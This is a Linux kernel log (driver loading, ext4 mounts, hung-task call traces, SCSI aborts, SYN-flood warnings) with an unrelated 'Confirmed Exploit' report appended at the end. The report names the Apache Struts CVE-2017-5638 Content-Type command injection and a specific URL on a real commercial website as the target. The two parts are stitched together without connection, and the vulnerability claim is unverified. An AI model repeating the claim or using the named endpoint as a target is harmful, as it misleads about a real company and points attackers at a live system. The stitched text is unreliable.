piix4_smbus 0000:00:07.3: Host SMBus controller not enabled!
shpchp: Standard Hot Plug PCI Controller Driver version: 0.4
vmci module is older than RHEL 6.2 ... applying fixups
[984]: VMCI: shared components initialized.
Probing for vmci/PCI.
vmci 0000:00:07.7: PCI INT A -> GSI 16 (level, low) -> IRQ 16
Found vmci/PCI at 0x1080, irq 16.
VMCI: using capabilities 0xc.
[984]: VMCI: Host capability check passed.
  alloc irq_desc for 75 on node -1
  alloc kstat_irqs on node -1
vmci 0000:00:07.7: irq 75 for MSI/MSI-X
  alloc irq_desc for 76 on node -1
  alloc kstat_irqs on node -1
vmci 0000:00:07.7: irq 76 for MSI/MSI-X
Registered vmci device.
[984]: VMCI: Using guest personality
[984]: VMCI: host components initialized.
[984]: VMCI: Module registered (name=vmci, major=10, minor=57).
[984]: VMCI: Using host personality
[984]: VMCI: Module (name=vmci) is initialized
udev: renamed network interface eth1 to eth9
sr 1:0:0:0: Attached scsi generic sg0 type 5
sd 2:0:0:0: Attached scsi generic sg1 type 0
sd 2:0:1:0: Attached scsi generic sg2 type 0
udev: renamed network interface eth0 to eth7
microcode: CPU0 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU1 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU2 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU3 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU4 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU5 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU6 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU7 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU8 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU9 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU10 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU11 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU12 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU13 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU14 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
microcode: CPU15 sig=0x206d2, pf=0x1, revision=0x710
platform microcode: firmware: requesting intel-ucode/06-2d-02
Microcode Update Driver: v2.00 , Peter Oruba
parport_pc 00:09: reported by Plug and Play ACPI
parport0: PC-style at 0x378, irq 7 [PCSPP,TRISTATE]
ppdev: user-space parallel port driver
EXT4-fs (sda1): mounted filesystem with ordered data mode. Opts: 
EXT4-fs (dm-7): mounted filesystem with ordered data mode. Opts: 
EXT4-fs (dm-8): mounted filesystem with ordered data mode. Opts: 
EXT4-fs (dm-9): mounted filesystem with ordered data mode. Opts: 
EXT4-fs (dm-10): mounted filesystem with ordered data mode. Opts: 
EXT4-fs (dm-11): mounted filesystem with ordered data mode. Opts: 
EXT4-fs (dm-2): warning: checktime reached, running e2fsck is recommended
EXT4-fs (dm-2): mounted filesystem with ordered data mode. Opts: 
EXT4-fs (dm-4): warning: checktime reached, running e2fsck is recommended
EXT4-fs (dm-4): mounted filesystem with ordered data mode. Opts: 
EXT4-fs (dm-3): warning: maximal mount count reached, running e2fsck is recommended
EXT4-fs (dm-3): mounted filesystem with ordered data mode. Opts: 
EXT4-fs (dm-5): warning: checktime reached, running e2fsck is recommended
EXT4-fs (dm-5): mounted filesystem with ordered data mode. Opts: 
EXT4-fs (dm-6): warning: checktime reached, running e2fsck is recommended
EXT4-fs (dm-6): mounted filesystem with ordered data mode. Opts: 
Adding 8388600k swap on /dev/mapper/rootvg-swaplv.  Priority:-1 extents:1 across:8388600k 
vsock module is older than RHEL 6.2 ... applying fixups
NET: Registered protocol family 10
lo: Disabled Privacy Extensions
eth7: intr type 3, mode 0, 9 vectors allocated
eth7: NIC Link is Up 10000 Mbps
eth9: intr type 3, mode 0, 9 vectors allocated
eth9: NIC Link is Up 10000 Mbps
RPC: Registered udp transport module.
RPC: Registered tcp transport module.
RPC: Registered tcp NFSv4.1 backchannel transport module.
eth7: no IPv6 routers present
eth9: no IPv6 routers present
readahead-collector: sorting
readahead-collector: finished
sd 2:0:1:0: [sdb] task abort on host 2, ffff88082760ac80
INFO: task jbd2/dm-4-8:1778 blocked for more than 120 seconds.
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
jbd2/dm-4-8   D 000000000000000f     0  1778      2 0x00000080
 ffff88082a43fd20 0000000000000046 0000000000000000 0000000000015fc0
 ffff88082cb39000 0000000000015fc0 0000000000015fc0 ffff88082994b500
 ffff88082994bab8 ffff88082a43ffd8 000000000000f4e8 ffff88082994bab8
Call Trace:
 [] jbd2_journal_commit_transaction+0x19f/0x14b0 [jbd2]
 [] ? __switch_to+0xd0/0x320
 [] ? lock_timer_base+0x3c/0x70
 [] ? autoremove_wake_function+0x0/0x40
 [] kjournald2+0xb8/0x220 [jbd2]
 [] ? autoremove_wake_function+0x0/0x40
 [] ? kjournald2+0x0/0x220 [jbd2]
 [] kthread+0x96/0xa0
 [] child_rip+0xa/0x20
 [] ? kthread+0x0/0xa0
 [] ? child_rip+0x0/0x20
INFO: task flush-253:4:1967 blocked for more than 120 seconds.
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
flush-253:4   D 000000000000000f     0  1967      2 0x00000080
 ffff88082ad554c0 0000000000000046 0000000000000000 ffffffffa00041fc
 ffff88082ad554b0 ffffffff81113273 ffff880828e8b000 ffff88082c2c3640
 ffff88082ab8f0f8 ffff88082ad55fd8 000000000000f4e8 ffff88082ab8f0f8
Call Trace:
 [] ? dm_table_unplug_all+0x5c/0x100 [dm_mod]
 [] ? mempool_alloc+0x63/0x140
 [] ? sync_buffer+0x0/0x50
 [] io_schedule+0x73/0xc0
 [] sync_buffer+0x40/0x50
 [] __wait_on_bit_lock+0x5a/0xc0
 [] ? mempool_alloc+0x63/0x140
 [] ? sync_buffer+0x0/0x50
 [] out_of_line_wait_on_bit_lock+0x78/0x90
 [] ? wake_bit_function+0x0/0x50
 [] __lock_buffer+0x36/0x40
 [] do_get_write_access+0x493/0x520 [jbd2]
 [] ? __jbd2_journal_file_buffer+0xd1/0x220 [jbd2]
 [] jbd2_journal_get_write_access+0x31/0x50 [jbd2]
 [] __ext4_journal_get_write_access+0x38/0x80 [ext4]
 [] ext4_ext_get_access+0x23/0x30 [ext4]
 [] ext4_ext_insert_extent+0x79b/0x10a0 [ext4]
 [] ext4_ext_get_blocks+0x119b/0x1a10 [ext4]
 [] ? submit_bio+0x8f/0x120
 [] ? unlock_page+0x27/0x30
 [] ext4_get_blocks+0xf5/0x2a0 [ext4]
 [] ? pagevec_lookup_tag+0x25/0x40
 [] mpage_da_map_blocks+0xac/0x450 [ext4]
 [] ext4_da_writepages+0x2f7/0x660 [ext4]
 [] do_writepages+0x21/0x40
 [] writeback_single_inode+0xdd/0x2c0
 [] writeback_sb_inodes+0xce/0x180
 [] writeback_inodes_wb+0xab/0x1b0
 [] wb_writeback+0x29b/0x3f0
 [] ? thread_return+0x4e/0x77e
 [] ? del_timer_sync+0x22/0x30
 [] wb_do_writeback+0x199/0x240
 [] bdi_writeback_task+0x63/0x1b0
 [] ? bit_waitqueue+0x17/0xd0
 [] ? bdi_start_fn+0x0/0x100
 [] bdi_start_fn+0x86/0x100
 [] ? bdi_start_fn+0x0/0x100
 [] kthread+0x96/0xa0
 [] child_rip+0xa/0x20
 [] ? kthread+0x0/0xa0
 [] ? child_rip+0x0/0x20
INFO: task Deferrable Alar:18690 blocked for more than 120 seconds.
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
Deferrable Al D 0000000000000001     0 18690      1 0x00000080
 ffff880383eb1c18 0000000000200086 0000000000000000 ffff88081b18a8c0
 ffff880383eb1c38 ffffffffa00b9b6e ffff880383eb1be8 01ffffff811a8b1c
 ffff880829905af8 ffff880383eb1fd8 000000000000f4e8 ffff880829905af8
Call Trace:
 [] ? ext4_getblk+0xee/0x1f0 [ext4]
 [] start_this_handle+0x25a/0x4d0 [jbd2]
 [] ? cache_alloc_refill+0x15b/0x240
 [] ? autoremove_wake_function+0x0/0x40
 [] jbd2_journal_start+0xb5/0x100 [jbd2]
 [] ? d_splice_alias+0xc6/0x110
 [] ext4_journal_start_sb+0x58/0x90 [ext4]
 [] ext4_create+0x77/0x150 [ext4]
 [] ? generic_permission+0x23/0xb0
 [] vfs_create+0xb4/0xe0
 [] do_filp_open+0xb2f/0xd60
 [] ? ext4_readdir+0x4a2/0x650 [ext4]
 [] ? alloc_fd+0x92/0x160
 [] do_sys_open+0x69/0x140
 [] sys_open+0x20/0x30
 [] system_call_fastpath+0x16/0x1b
INFO: task LocalNotificati:5192 blocked for more than 120 seconds.
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
LocalNotifica D 0000000000000001     0  5192      1 0x00000080
 ffff88040ec4ba88 0000000000200086 0000000000000000 0000000100000002
 0000000000000001 ffff880045650500 000000010ec4ba28 0000000000000008
 ffff8804fd13c678 ffff88040ec4bfd8 000000000000f4e8 ffff8804fd13c678
Call Trace:
 [] start_this_handle+0x25a/0x4d0 [jbd2]
 [] ? autoremove_wake_function+0x0/0x40
 [] jbd2_journal_start+0xb5/0x100 [jbd2]
 [] ext4_journal_start_sb+0x58/0x90 [ext4]
 [] ext4_dirty_inode+0x2a/0x60 [ext4]
 [] __mark_inode_dirty+0x3b/0x160
 [] file_update_time+0xf2/0x170
 [] __generic_file_aio_write+0x220/0x480
 [] generic_file_aio_write+0x6f/0xe0
 [] ext4_file_write+0x61/0x1e0 [ext4]
 [] do_sync_write+0xfa/0x140
 [] ? autoremove_wake_function+0x0/0x40
 [] ? hrtimer_cancel+0x22/0x30
 [] ? security_file_permission+0x16/0x20
 [] vfs_write+0xb8/0x1a0
 [] sys_write+0x51/0x90
 [] system_call_fastpath+0x16/0x1b
INFO: task WebContainer : :9335 blocked for more than 120 seconds.
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
WebContainer  D 0000000000000000     0  9335      1 0x00000080
 ffff88058e9d5988 0000000000200082 0000000000000000 0000000000200246
 ffff88058e9d5938 ffffffffa00663e0 ffffffff81133059 0000000000200286
 ffff88058eb3baf8 ffff88058e9d5fd8 000000000000f4e8 ffff88058eb3baf8
Call Trace:
 [] ? zone_statistics+0x99/0xc0
 [] ? sync_page+0x0/0x50
 [] io_schedule+0x73/0xc0
 [] sync_page+0x3d/0x50
 [] __wait_on_bit_lock+0x5a/0xc0
 [] __lock_page+0x67/0x70
 [] ? wake_bit_function+0x0/0x50
 [] ? find_get_page+0x1e/0xa0
 [] find_lock_page+0x4c/0x80
 [] grab_cache_page_write_begin+0x4a/0xc0
 [] ext4_da_write_begin+0xb4/0x200 [ext4]
 [] ? jbd2_journal_stop+0x1e6/0x2b0 [jbd2]
 [] generic_file_buffered_write+0x10e/0x2a0
 [] ? ext4_dirty_inode+0x4f/0x60 [ext4]
 [] __generic_file_aio_write+0x250/0x480
 [] generic_file_aio_write+0x6f/0xe0
 [] ext4_file_write+0x61/0x1e0 [ext4]
 [] do_sync_write+0xfa/0x140
 [] ? autoremove_wake_function+0x0/0x40
 [] ? security_file_permission+0x16/0x20
 [] vfs_write+0xb8/0x1a0
 [] sys_write+0x51/0x90
 [] system_call_fastpath+0x16/0x1b
INFO: task WebContainer : :11276 blocked for more than 120 seconds.
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
WebContainer  D 0000000000000008     0 11276      1 0x00000080
 ffff8804b80979d8 0000000000200086 0000000000000000 ffff88082994b500
 ffff8800459d5fc0 0000000000000000 0000000000000008 000000000000000f
 ffff8804b8095a78 ffff8804b8097fd8 000000000000f4e8 ffff8804b8095a78
Call Trace:
 [] start_this_handle+0x25a/0x4d0 [jbd2]
 [] ? autoremove_wake_function+0x0/0x40
 [] jbd2_journal_start+0xb5/0x100 [jbd2]
 [] ext4_journal_start_sb+0x58/0x90 [ext4]
 [] ext4_da_write_begin+0x91/0x200 [ext4]
 [] ? jbd2_journal_stop+0x1e6/0x2b0 [jbd2]
 [] generic_file_buffered_write+0x10e/0x2a0
 [] ? ext4_dirty_inode+0x4f/0x60 [ext4]
 [] __generic_file_aio_write+0x250/0x480
 [] generic_file_aio_write+0x6f/0xe0
 [] ext4_file_write+0x61/0x1e0 [ext4]
 [] ? autoremove_wake_function+0x0/0x40
 [] do_sync_write+0xfa/0x140
 [] ? autoremove_wake_function+0x0/0x40
 [] ? security_file_permission+0x16/0x20
 [] vfs_write+0xb8/0x1a0
 [] sys_write+0x51/0x90
 [] system_call_fastpath+0x16/0x1b
INFO: task splunkd:31384 blocked for more than 120 seconds.
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
splunkd       D 0000000000000003     0 31384      1 0x00000080
 ffff880819681e38 0000000000000082 0000000000000000 ffff880819681dc8
 ffff8807f4897980 ffff880819681eb8 ffff880819681f48 00007f7860ffe440
 ffff8806a5a2fab8 ffff880819681fd8 000000000000f4e8 ffff8806a5a2fab8
Call Trace:
 [] __mutex_lock_slowpath+0x13e/0x180
 [] mutex_lock+0x2b/0x50
 [] ext4_llseek+0x60/0x110 [ext4]
 [] vfs_llseek+0x3a/0x40
 [] sys_lseek+0x66/0x80
 [] system_call_fastpath+0x16/0x1b
INFO: task WebContainer : :23551 blocked for more than 120 seconds.
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
WebContainer  D 000000000000000f     0 23551      1 0x00000080
 ffff88082b68da88 0000000000200082 0000000000000000 0000000f00000002
 0000000000000001 ffff8800459d0500 0000000100000002 0000000000000008
 ffff880827e4e6b8 ffff88082b68dfd8 000000000000f4e8 ffff880827e4e6b8
Call Trace:
 [] start_this_handle+0x25a/0x4d0 [jbd2]
 [] ? cache_alloc_refill+0x15b/0x240
 [] ? autoremove_wake_function+0x0/0x40
 [] jbd2_journal_start+0xb5/0x100 [jbd2]
 [] ext4_journal_start_sb+0x58/0x90 [ext4]
 [] ext4_dirty_inode+0x2a/0x60 [ext4]
 [] __mark_inode_dirty+0x3b/0x160
 [] file_update_time+0xf2/0x170
 [] __generic_file_aio_write+0x220/0x480
 [] generic_file_aio_write+0x6f/0xe0
 [] ext4_file_write+0x61/0x1e0 [ext4]
 [] do_sync_write+0xfa/0x140
 [] ? autoremove_wake_function+0x0/0x40
 [] ? native_sched_clock+0x13/0x60
 [] ? sched_clock_cpu+0xcd/0x110
 [] ? task_sched_runtime+0x46/0xa0
 [] ? security_file_permission+0x16/0x20
 [] vfs_write+0xb8/0x1a0
 [] sys_write+0x51/0x90
 [] system_call_fastpath+0x16/0x1b
INFO: task WebContainer : :20069 blocked for more than 120 seconds.
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
WebContainer  D 0000000000000000     0 20069      1 0x00000080
 ffff8803356eba88 0000000000200082 0000000000000000 0000000000000014
 ffff8803356eba08 ffffffff814212d7 ffff8806a5b570c0 ffff8806a5b570c0
 ffff8807f48e9ab8 ffff8803356ebfd8 000000000000f4e8 ffff8807f48e9ab8
Call Trace:
 [] ? __kfree_skb+0x47/0xa0
 [] start_this_handle+0x25a/0x4d0 [jbd2]
 [] ? cache_alloc_refill+0x15b/0x240
 [] ? autoremove_wake_function+0x0/0x40
 [] jbd2_journal_start+0xb5/0x100 [jbd2]
 [] ext4_journal_start_sb+0x58/0x90 [ext4]
 [] ext4_dirty_inode+0x2a/0x60 [ext4]
 [] __mark_inode_dirty+0x3b/0x160
 [] file_update_time+0xf2/0x170
 [] __generic_file_aio_write+0x220/0x480
 [] ? sock_recvmsg+0x133/0x160
 [] generic_file_aio_write+0x6f/0xe0
 [] ext4_file_write+0x61/0x1e0 [ext4]
 [] do_sync_write+0xfa/0x140
 [] ? user_path_at+0x62/0xa0
 [] ? autoremove_wake_function+0x0/0x40
 [] ? security_file_permission+0x16/0x20
 [] vfs_write+0xb8/0x1a0
 [] sys_write+0x51/0x90
 [] system_call_fastpath+0x16/0x1b
INFO: task WebContainer : :11352 blocked for more than 120 seconds.
"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.
WebContainer  D 0000000000000000     0 11352      1 0x00000080
 ffff88080a45da88 0000000000200082 0000000000000000 0000000000000002
 0000000100000001 ffff880045610500 000000010a45da48 0000000000000008
 ffff88065c509a78 ffff88080a45dfd8 000000000000f4e8 ffff88065c509a78
Call Trace:
 [] start_this_handle+0x25a/0x4d0 [jbd2]
 [] ? cache_alloc_refill+0x15b/0x240
 [] ? autoremove_wake_function+0x0/0x40
 [] jbd2_journal_start+0xb5/0x100 [jbd2]
 [] ext4_journal_start_sb+0x58/0x90 [ext4]
 [] ext4_dirty_inode+0x2a/0x60 [ext4]
 [] __mark_inode_dirty+0x3b/0x160
 [] file_update_time+0xf2/0x170
 [] __generic_file_aio_write+0x220/0x480
 [] generic_file_aio_write+0x6f/0xe0
 [] ext4_file_write+0x61/0x1e0 [ext4]
 [] do_sync_write+0xfa/0x140
 [] ? user_path_at+0x62/0xa0
 [] ? autoremove_wake_function+0x0/0x40
 [] ? native_sched_clock+0x13/0x60
 [] ? sched_clock_cpu+0xcd/0x110
 [] ? task_sched_runtime+0x46/0xa0
 [] ? security_file_permission+0x16/0x20
 [] vfs_write+0xb8/0x1a0
 [] sys_write+0x51/0x90
 [] system_call_fastpath+0x16/0x1b
sd 2:0:1:0: [sdb] task abort on host 2, ffff8807d3167980
sd 2:0:0:0: [sda] task abort on host 2, ffff88082174bb80
sd 2:0:1:0: [sdb] task abort on host 2, ffff880126740dc0
possible SYN flooding on port 9212. Sending cookies.
sd 2:0:0:0: [sda] task abort on host 2, ffff880829b6e580
sd 2:0:0:0: [sda] SCSI device reset on scsi2:0
sd 2:0:0:0: [sda] task abort on host 2, ffff880821907280
sd 2:0:1:0: [sdb] task abort on host 2, ffff8807d338d880
sd 2:0:1:0: [sdb] task abort on host 2, ffff880501a8eb80
sd 2:0:0:0: [sda] task abort on host 2, ffff880829b6e180
hrtimer: interrupt took 105648355 ns
[0]: VMCI: Updating context from (ID=0xffffffff) to (ID=0x87bf81aa) on event (type=0).
[5034]: VMCI: Updating context from (ID=0x87bf81aa) to (ID=0x87bf81aa) on event (type=0).
[5603]: VMCI: Updating context from (ID=0x87bf81aa) to (ID=0x87bf81aa) on event (type=0).
possible SYN flooding on port 9210. Sending cookies.
possible SYN flooding on port 9210. Sending cookies.
possible SYN flooding on port 9210. Sending cookies.
Confirmed ExploitCVE-2017-5638
Description
The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 mishandles file upload, which allows remote attackers to execute arbitrary commands via a #cmd= string in a crafted Content-Type HTTP header, as exploited in the wild in March 2017.
URL https://www.cars.com/for-sale/savedSearch/searches.json
Injection Type Content-Type: Header
Other information Verified Exploit Report